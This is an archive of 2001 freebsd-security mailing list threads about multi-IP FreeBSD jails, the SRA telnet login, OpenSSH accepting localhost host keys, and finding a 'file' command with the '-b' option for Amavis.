From: Attila Nagy
To: Dave Whitaker
Cc:
Subject: Re: Jails and FreeBSD4.3
In-Reply-To: <20010507121223.C33043@moo.udder.org>
Message-ID: <20010507211620.L52787-100000@scribble.fsn.hu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

> I recently installed FreeBSD 4.3, specifically wanting to mess with
> jails. Everything appears to work fine, except I use apache with
> mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I
> need to get the jail to bind to many IPs, rather than just one. Is
> there any way to do this, or would anyone be willing to provide me
> with a patch to do so?

You can solve at least apache with IPF (ipnat) and IPFW.
Just forward the needed ports (in case of apache) to the daemon running
in the jail. For running an FTP server you have to set up the forward
stuff more carefully (maybe with NAT) because of the behaviour of the
FTP protocol.

--------------------------------------------------------------------------
Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758

From owner-freebsd-security Mon May 7 13:29:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 3191E37B422 for ; Mon, 7 May 2001 13:29:08 -0700 (PDT) (envelope-from dave@moo.udder.org)
Received: (from dave@localhost) by moo.udder.org id f47KT5673529; Mon, 7 May 2001 13:29:05 -0700 (PDT)
Date: Mon, 7 May 2001 13:29:04 -0700
From: Dave Whitaker
To: Attila Nagy
Cc: freebsd-security@freebsd.org
Subject: Re: Jails and FreeBSD4.3
Message-ID: <20010507132904.E33043@moo.udder.org>
Mail-Followup-To: Attila Nagy , freebsd-security@freebsd.org
References: <20010507123328.D33043@moo.udder.org> <20010507213433.G52787-100000@scribble.fsn.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010507213433.G52787-100000@scribble.fsn.hu>; from bra@fsn.hu on Mon, May 07, 2001 at 09:36:16PM +0200
Organization: Quiknet Inc. Roseville, CA
X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Attila,

Yeah, it would be nice if you could bind the jail to a list of IPs or
whatever. It seems like it would be the kind of functionality that would
be desired by more people than just me. Right now, it's the only thing
preventing me from moving anything over to a jail.
Almost every service I run needs more than one IP. My $0.02.

Dave

On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote:
> Hello,
>
> > It uses mod_vhost_alias to pull the file based on the request made.
> > If I forward all of the requests to the one IP, it will act as if it
> > was requested from that IP, correct? 'sides, shouldn't jail have the
> > ability to run on more than one IP if told to? Any more ideas?
> Silly me. Never write when you are sleepy :)
>
> You are right. Personally I don't know about the multiple IP per jail
> feature.
>
> Sorry.
>
> --------------------------------------------------------------------------
> Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
> Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
> H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758
>

From owner-freebsd-security Mon May 7 13:33:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 56B1337B422 for ; Mon, 7 May 2001 13:33:12 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f47KWs851622; Mon, 7 May 2001 22:32:54 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Dave Whitaker
Cc: Attila Nagy , freebsd-security@FreeBSD.ORG
Subject: Re: Jails and FreeBSD4.3
In-Reply-To: Your message of "Mon, 07 May 2001 13:29:04 PDT." <20010507132904.E33043@moo.udder.org>
Date: Mon, 07 May 2001 22:32:54 +0200
Message-ID: <51620.989267574@critter>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Let me just say that making a multi-IP-number jail is not impossible,
only slightly tricky, but it was not in the original contract under
which Jail was developed, and that contract is long since closed
anyway so I have no funding to pay for my time right now and since
I don't need it myself it ain't happening in my spare time...

Poul-Henning

In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes:
> Attila,
> Yeah, it would be nice if you could bind the jail to a list of IPs or
> whatever. It seems like it would be the kind of functionality that
> would be desired by more people than just me. Right now, it's the only
> thing preventing me from moving anything over to a jail. Almost every
> service I run needs more than one IP. My $0.02.
>
> Dave
>
> On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote:
>> Hello,
>>
>> > It uses mod_vhost_alias to pull the file based on the request made.
>> > If I forward all of the requests to the one IP, it will act as if it
>> > was requested from that IP, correct? 'sides, shouldn't jail have the
>> > ability to run on more than one IP if told to? Any more ideas?
>> Silly me. Never write when you are sleepy :)
>>
>> You are right. Personally I don't know about the multiple IP per jail
>> feature.
>>
>> Sorry.
>>
>> --------------------------------------------------------------------------
>> Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
>> Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
>> H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758
>>
>

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Mon May 7 14: 1:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 529DE37B423 for ; Mon, 7 May 2001 14:01:34 -0700 (PDT) (envelope-from dave@moo.udder.org)
Received: (from dave@localhost) by moo.udder.org id f47L1WQ73825; Mon, 7 May 2001 14:01:32 -0700 (PDT)
Date: Mon, 7 May 2001 14:01:32 -0700
From: Dave Whitaker
To: Jason DiCioccio
Cc: freebsd-security@freebsd.org
Subject: Re: Jails and FreeBSD4.3
Message-ID: <20010507140132.G33043@moo.udder.org>
Mail-Followup-To: Jason DiCioccio , freebsd-security@freebsd.org
References: <20010507205812.58C9D13649@bluenugget.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010507205812.58C9D13649@bluenugget.net>; from geniusj@bluenugget.net on Mon, May 07, 2001 at 12:58:08PM -0800
Organization: Quiknet Inc. Roseville, CA
X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

JD:

I actually emailed him the same question. He seemed like the
appropriate person to ask when I was searching through archives, but I
figured I might get more response mailing the list.

Dave

On Mon, May 07, 2001 at 12:58:08PM -0800, Jason DiCioccio wrote:
> Actually.. I thought Robert Watson was working on jail now (among
> other things).. That was the case last I talked to him..
>
> Cheers,
> -JD-
>
> On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote:
>
> >
> > Let me just say that making a multi-IP-number jail is not impossible,
> > only slightly tricky, but it was not in the original contract under
> > which Jail was developed, and that contract is long since closed
> > anyway so I have no funding to pay for my time right now and since
> > I don't need it myself it ain't happening in my spare time...
> >
> > Poul-Henning
> >
> > In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes:
> > > Attila,
> > > Yeah, it would be nice if you could bind the jail to a list of IPs
> > > or whatever. It seems like it would be the kind of functionality
> > > that would be desired by more people than just me. Right now, it's
> > > the only thing preventing me from moving anything over to a jail.
> > > Almost every service I run needs more than one IP. My $0.02.
> > >
> > > Dave
> > >
> > > On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote:
> > >> Hello,
> > >>
> > >> > It uses mod_vhost_alias to pull the file based on the request made.
> > >> > If I forward all of the requests to the one IP, it will act as if it
> > >> > was requested from that IP, correct? 'sides, shouldn't jail have the
> > >> > ability to run on more than one IP if told to? Any more ideas?
> > >> Silly me. Never write when you are sleepy :)
> > >>
> > >> You are right. Personally I don't know about the multiple IP per jail
> > >> feature.
> > >>
> > >> Sorry.
> > >>
> > >> --------------------------------------------------------------------------
> > >> Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
> > >> Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
> > >> H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758
> > >>
> > >
> >
> > --
> > Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
> > phk@FreeBSD.ORG         | TCP/IP since RFC 956
> > FreeBSD committer       | BSD since 4.3-tahoe
> > Never attribute to malice what can adequately be explained by
> > incompetence.
> >
>

From owner-freebsd-security Mon May 7 14:10:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id A74B937B424 for ; Mon, 7 May 2001 14:10:13 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f47L9w852001; Mon, 7 May 2001 23:09:58 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Jason DiCioccio
Cc: bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org
Subject: Re: Jails and FreeBSD4.3
In-Reply-To: Your message of "Mon, 07 May 2001 12:58:08 PST." <20010507205812.58C9D13649@bluenugget.net>
Date: Mon, 07 May 2001 23:09:58 +0200
Message-ID: <51999.989269798@critter>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

He is, but I don't know what the ETA of jailNG is...

In message <20010507205812.58C9D13649@bluenugget.net>, Jason DiCioccio writes:
> Actually.. I thought Robert Watson was working on jail now (among
> other things).. That was the case last I talked to him..
>
> Cheers,
> -JD-
>
> On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote:
>
>>
>> Let me just say that making a multi-IP-number jail is not impossible,
>> only slightly tricky, but it was not in the original contract under
>> which Jail was developed, and that contract is long since closed
>> anyway so I have no funding to pay for my time right now and since
>> I don't need it myself it ain't happening in my spare time...
>>
>> Poul-Henning
>>
>> In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes:
>> > Attila,
>> > Yeah, it would be nice if you could bind the jail to a list of IPs
>> > or whatever. It seems like it would be the kind of functionality
>> > that would be desired by more people than just me. Right now, it's
>> > the only thing preventing me from moving anything over to a jail.
>> > Almost every service I run needs more than one IP. My $0.02.
>> >
>> > Dave
>> >
>> > On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote:
>> >> Hello,
>> >>
>> >> > It uses mod_vhost_alias to pull the file based on the request made.
>> >> > If I forward all of the requests to the one IP, it will act as if it
>> >> > was requested from that IP, correct? 'sides, shouldn't jail have the
>> >> > ability to run on more than one IP if told to? Any more ideas?
>> >> Silly me. Never write when you are sleepy :)
>> >>
>> >> You are right. Personally I don't know about the multiple IP per jail
>> >> feature.
>> >>
>> >> Sorry.
>> >>
>> >> --------------------------------------------------------------------------
>> >> Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
>> >> Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
>> >> H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758
>> >>
>> >
>>
>> --
>> Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
>> phk@FreeBSD.ORG         | TCP/IP since RFC 956
>> FreeBSD committer       | BSD since 4.3-tahoe
>> Never attribute to malice what can adequately be explained by
>> incompetence.
>>
>
>

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Mon May 7 14:29:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bluenugget.net (babyviolence.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 8670F37B422 for ; Mon, 7 May 2001 14:29:46 -0700 (PDT) (envelope-from geniusj@bluenugget.net)
Received: from bluenugget.net (localhost.com [127.0.0.1]) by bluenugget.net (Postfix) with ESMTP id 58C9D13649; Mon, 7 May 2001 13:58:12 -0700 (PDT)
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
To: phk@critter.freebsd.dk
From: Jason DiCioccio
Cc: bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org
X-Originating-Ip: 63.93.9.98
MIME-Version: 1.0
Reply-To: Jason DiCioccio
Date: Mon, 07 May 2001 12:58:08 PST
X-Mailer: EMUmail 4.5
Subject: Re: Jails and FreeBSD4.3
X-Webmail-User: geniusj@bluenugget.net
Message-Id: <20010507205812.58C9D13649@bluenugget.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Actually.. I thought Robert Watson was working on jail now (among
other things).. That was the case last I talked to him..

Cheers,
-JD-

On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote:

>
> Let me just say that making a multi-IP-number jail is not impossible,
> only slightly tricky, but it was not in the original contract under
> which Jail was developed, and that contract is long since closed
> anyway so I have no funding to pay for my time right now and since
> I don't need it myself it ain't happening in my spare time...
>
> Poul-Henning
>
> In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes:
> > Attila,
> > Yeah, it would be nice if you could bind the jail to a list of IPs
> > or whatever. It seems like it would be the kind of functionality
> > that would be desired by more people than just me. Right now, it's
> > the only thing preventing me from moving anything over to a jail.
> > Almost every service I run needs more than one IP. My $0.02.
> >
> > Dave
> >
> > On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote:
> >> Hello,
> >>
> >> > It uses mod_vhost_alias to pull the file based on the request made.
> >> > If I forward all of the requests to the one IP, it will act as if it
> >> > was requested from that IP, correct? 'sides, shouldn't jail have the
> >> > ability to run on more than one IP if told to? Any more ideas?
> >> Silly me. Never write when you are sleepy :)
> >>
> >> You are right. Personally I don't know about the multiple IP per jail
> >> feature.
> >>
> >> Sorry.
> >>
> >> --------------------------------------------------------------------------
> >> Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
> >> Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
> >> H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758
> >>
> >
>
> --
> Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
> phk@FreeBSD.ORG         | TCP/IP since RFC 956
> FreeBSD committer       | BSD since 4.3-tahoe
> Never attribute to malice what can adequately be explained by
> incompetence.
>

From owner-freebsd-security Mon May 7 14:31:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from citadel.simphost.com (citadel.simphost.com [216.253.163.10]) by hub.freebsd.org (Postfix) with ESMTP id E998737B423; Mon, 7 May 2001 14:31:14 -0700 (PDT) (envelope-from jlschwab@simphost.com)
Received: by citadel.simphost.com (Postfix, from userid 1000) id 17EEC24D04; Mon, 7 May 2001 12:35:48 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by citadel.simphost.com (Postfix) with ESMTP id ED7A020F03; Mon, 7 May 2001 12:35:47 -0400 (EDT)
Date: Mon, 7 May 2001 12:35:47 -0400 (EDT)
From: jlschwab
To: ,
Subject: SRA..
Message-ID: <20010507123414.X2167-100000@citadel.simphost.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Heya Guys and Gals;

Trying any.of.my.machines.ips...
Connected to X.X.X.X.
Escape character is '^]'.
Trying SRA secure login:
User (root):
Password:

What is SRA, secure telnet login? And how can I disable this?

I also noticed it only works from freebsd -> freebsd boxes.

thanks.
From owner-freebsd-security Mon May 7 16:45:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 840E137B422 for ; Mon, 7 May 2001 16:45:40 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id BAA54078; Tue, 8 May 2001 01:45:33 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Poul-Henning Kamp
Cc: Jason DiCioccio , bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org
Subject: Re: Jails and FreeBSD4.3
References: <51999.989269798@critter>
From: Dag-Erling Smorgrav
Date: 08 May 2001 01:45:33 +0200
In-Reply-To: <51999.989269798@critter>
Message-ID:
Lines: 8
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Poul-Henning Kamp writes:
> He is, but I don't know what the ETA of jailNG is...

I think "never in RELENG_4" is a safe assumption.
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon May 7 17:52:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 6145737B423 for ; Mon, 7 May 2001 17:52:30 -0700 (PDT) (envelope-from docs@mailer.progressive-comp.com)
Received: (from docs@localhost) by mailer.progressive-comp.com with id UAA10252; Mon, 7 May 2001 20:51:44 -0400
Date: Mon, 7 May 2001 20:51:44 -0400
Message-Id: <200105080051.UAA10252@mailer.progressive-comp.com>
From: Hank Leininger
Reply-To: Hank Leininger
To: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH accepts any RSA key from host 127.0.0.1, even on non-default ports
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2001-05-03, Robert Watson wrote:

> and was told it was a "feature" -- intended to allow people to "ssh
> localhost" without getting key errors when using NFS mounted home
> directories. Bleh.

That rationale sounds reasonable, but even if so, IMHO only 127.0.0.1
should be magical this way. Connecting to other loopback net addresses
(127.213.75.23, etc) should be checked as usual. Then one could use
alternate loopback addrs for specific tunnels, each of which can have
their own host key.

> really, it would be nice if there was a way to say:
> ssh -p 5646 -usekeyfor fledge.watson.org localhost
> I.e., connect to localhost:5646, but use the host key associated with
> fledge.watson.org in the keys file.

Would something like setting HostKeyAlias work?
  ssh -p 5646 -o HostKeyAlias=fledge.watson.org localhost

(Of course the above is bogus since localhost is magically accepted...)

Then you'd set up ~/.ssh/config entries so that 'ssh fledge'
automatically connected to localhost:5646 (or 127.156.12.50:5646) with
the right HostKeyAlias set.

--
Hank Leininger

From owner-freebsd-security Tue May 8 2:40: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web13802.mail.yahoo.com (web13802.mail.yahoo.com [216.136.175.12]) by hub.freebsd.org (Postfix) with SMTP id 05A0B37B422 for ; Tue, 8 May 2001 02:40:03 -0700 (PDT) (envelope-from uktests@yahoo.com)
Message-ID: <20010508094002.41629.qmail@web13802.mail.yahoo.com>
Received: from [159.148.130.2] by web13802.mail.yahoo.com; Tue, 08 May 2001 02:40:02 PDT
Date: Tue, 8 May 2001 02:40:02 -0700 (PDT)
From: John Braun
Subject: Problems with Amavis setup
To: freebsd-security@FreeBSD.ORG
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi!

I can't download the "file" command for "Amavis" from

ftp://ftp.astron.com/pub/file/,
ftp://ftp.gw.com/pub/unix/file/ and
ftp://ftp.funet.fi/pub/unix/tools/file/.

Where can I get this command?

regards
Uldis

__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/

From owner-freebsd-security Tue May 8 6:45:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 567DE37B423 for ; Tue, 8 May 2001 06:45:35 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 1289 invoked by uid 1000); 8 May 2001 14:57:35 -0000
Date: Tue, 8 May 2001 17:57:35 +0300
From: Peter Pentchev
To: John Braun
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Problems with Amavis setup
Message-ID: <20010508175735.A1248@ringworld.oblivion.bg>
Mail-Followup-To: John Braun , freebsd-security@FreeBSD.ORG
References: <20010508094002.41629.qmail@web13802.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010508094002.41629.qmail@web13802.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 02:40:02AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote:
> Hi!
>
> I can't download the "file" command for "Amavis" from
>
> ftp://ftp.astron.com/pub/file/,
> ftp://ftp.gw.com/pub/unix/file/ and
> ftp://ftp.funet.fi/pub/unix/tools/file/.
>
> Where can I get this command?

The 'file' command is part of FreeBSD; it is installed as part of
the FreeBSD installation. Look for it in /usr/bin. If Amavis
cannot execute the 'file' command, make sure it has /usr/bin in
its path.

G'luck,
Peter

--
This sentence no verb.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 6:52:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from rafiu.psi-domain.co.uk (rafiu.psi-domain.co.uk [212.87.84.199]) by hub.freebsd.org (Postfix) with ESMTP id 4897037B423 for ; Tue, 8 May 2001 06:52:56 -0700 (PDT) (envelope-from heckfordj@psi-domain.co.uk) Received: from smtp.psi-domain.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by rafiu.psi-domain.co.uk (Postfix) with SMTP id 73EC4402EC6; Tue, 8 May 2001 14:48:16 +0100 (BST) Date: Tue, 8 May 2001 15:51:33 +0100 From: Jamie Heckford To: Peter Pentchev Cc: freebsd-security@freebsd.org Subject: Re: Problems with Amavis setup Message-ID: <20010508155133.C675@storm.psi-domain.co.uk> Reply-To: heckfordj@psi-domain.co.uk References: <20010508094002.41629.qmail@web13802.mail.yahoo.com> <20010508175735.A1248@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <20010508175735.A1248@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, May 08, 2001 at 15:57:35 +0100 X-Mailer: Balsa 1.1.1 Lines: 55 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think the file distributed with FreeBSD is different from the version distributed with popular Linux Distros. Think the Linux one allows you to do something special "grep" style. Jamie On 2001.05.08 15:57 Peter Pentchev wrote: > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote: > > Hi! > > > > I can't download "file" command for "Amavis" from > > > > ftp://ftp.astron.com/pub/file/, > > ftp://ftp.gw.com/pub/unix/file/ and > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > Where can I get this command ? > > The 'file' command is part of FreeBSD; it is installed as part of > the FreeBSD installation. Look for it in /usr/bin. 
> If Amavis
> cannot execute the 'file' command, make sure it has /usr/bin in
> its path.
>
> G'luck,
> Peter
>
> --
> This sentence no verb.
>

--
Jamie Heckford
Network Operations Manager
Psi-Domain - Innovative Linux Solutions. Ask Us How.
FreeBSD - The power to serve

Join our mailing list and stay informed by emailing
majordomo@psi-domain.co.uk with the line: subscribe collective
=====================================
email: heckfordj@psi-domain.co.uk
web: http://www.psi-domain.co.uk/
tel: +44 (0)1737 789 246
fax: +44 (0)1737 789 245
mobile: +44 (0)7866 724 224
=====================================

From owner-freebsd-security Tue May 8 6:59:55 2001
Date: Tue, 8 May 2001 06:59:42 -0700 (PDT)
From: John Braun
To: freebsd-security@freebsd.org
Subject: Re: Problems with Amavis setup
Message-ID: <20010508135942.70161.qmail@web13804.mail.yahoo.com>
In-Reply-To: <20010508175735.A1248@ringworld.oblivion.bg>

Of course, FreeBSD has this command, but Amavis requires the file
command with option -b. If I'm not mistaken, version 4.1 hasn't this
option.

Where can I get source or package for this command?

Or does someone know how to install Amavis without 'file -b'?

--- Peter Pentchev wrote:
> On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote:
> > Hi!
> >
> > I can't download "file" command for "Amavis" from
> >
> > ftp://ftp.astron.com/pub/file/,
> > ftp://ftp.gw.com/pub/unix/file/ and
> > ftp://ftp.funet.fi/pub/unix/tools/file/.
> >
> > Where can I get this command ?
>
> The 'file' command is part of FreeBSD; it is installed as part of
> the FreeBSD installation. Look for it in /usr/bin. If Amavis
> cannot execute the 'file' command, make sure it has /usr/bin in
> its path.
>
> G'luck,
> Peter
>
> --
> This sentence no verb.

__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/

From owner-freebsd-security Tue May 8 7:39:51 2001
Date: Tue, 8 May 2001 18:51:49 +0300
From: Peter Pentchev
To: John Braun
Cc: freebsd-security@freebsd.org
Subject: Re: Problems with Amavis setup
Message-ID: <20010508185149.A430@ringworld.oblivion.bg>
References: <20010508175735.A1248@ringworld.oblivion.bg> <20010508135942.70161.qmail@web13804.mail.yahoo.com>
In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 06:59:42AM -0700

On Tue, May 08, 2001 at 06:59:42AM -0700, John Braun wrote:
> Ofcourse, FreeBSD has this command, but
> Amavis requires command file with option -b.
> If I don't mistake in version 4.1. hasn't this
> option.
>
> Where can I get source or package for this command?
>
> Or someone know howto install Amavis without 'file
> -b'?

Oh, yes, that's correct - the version of file(1) in FreeBSD 4.1 does
not yet have the '-b' option. You can get a newer version of file(1)
from the FreeBSD CVS repository at http://www.FreeBSD.org/cgi/cvsweb.cgi
or from an ISO image of FreeBSD 4.3. If you're interested, I could
send you the sources myself. You need the src/usr.bin/file/ directory,
but also the src/contrib/file/ tree, for it is there that the file(1)
sources live now.

G'luck,
Peter

--
This sentence is false.

> --- Peter Pentchev wrote:
> > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote:
> > > Hi!
> > >
> > > I can't download "file" command for "Amavis" from
> > >
> > > ftp://ftp.astron.com/pub/file/,
> > > ftp://ftp.gw.com/pub/unix/file/ and
> > > ftp://ftp.funet.fi/pub/unix/tools/file/.
> > >
> > > Where can I get this command ?
> >
> > The 'file' command is part of FreeBSD; it is installed as part of
> > the FreeBSD installation. Look for it in /usr/bin. If Amavis
> > cannot execute the 'file' command, make sure it has /usr/bin in
> > its path.
From owner-freebsd-security Tue May 8 7:53:09 2001
Date: Tue, 8 May 2001 09:52:49 -0500
From: jamie rishaw
To: John Braun
Cc: freebsd-security@freebsd.org
Subject: Re: Problems with Amavis setup
Message-ID: <20010508095249.O22195@playboy.com>
References: <20010508175735.A1248@ringworld.oblivion.bg> <20010508135942.70161.qmail@web13804.mail.yahoo.com>
In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 06:59:42AM -0700
X-No-Archive: yes

Hi,

I put a copy of the 'file' that I use for amavis on my personal colo,
if you want it. I can't seem to find source, but this should help..

I put it in /usr/local/bin/file

It's at http://arpa.com/~jamie/bin/file.gz

It was compiled on a 4.2-R box..

MD5 (file.gz) = 39f517d2495b20d2b95f08123eaed38a
MD5 (/usr/local/bin/file) = 728db5c95258ef828ee224b1b197d74a

Regards,
jamie

On Tue, May 08, 2001 at 06:59:42AM -0700, John Braun wrote:
> Ofcourse, FreeBSD has this command, but
> Amavis requires command file with option -b.
> If I don't mistake in version 4.1. hasn't this
> option.
>
> Where can I get source or package for this command?
>
> Or someone know howto install Amavis without 'file
> -b'?
>
>
> --- Peter Pentchev wrote:
> > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote:
> > > Hi!
> > >
> > > I can't download "file" command for "Amavis" from
> > >
> > > ftp://ftp.astron.com/pub/file/,
> > > ftp://ftp.gw.com/pub/unix/file/ and
> > > ftp://ftp.funet.fi/pub/unix/tools/file/.
> > >
> > > Where can I get this command ?
> >
> > The 'file' command is part of FreeBSD; it is installed as part of
> > the FreeBSD installation. Look for it in /usr/bin. If Amavis
> > cannot execute the 'file' command, make sure it has /usr/bin in
> > its path.
> >
> > G'luck,
> > Peter
> >
> > --
> > This sentence no verb.
>
>
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Auctions - buy the things you want at great prices
> http://auctions.yahoo.com/
>

--
jamie rishaw
sr. wan/unix engineer/ninja // playboy enterprises inc.
opinions stated are mine, and are not necessarily those of the bunny.

From owner-freebsd-security Tue May 8 8:31:41 2001
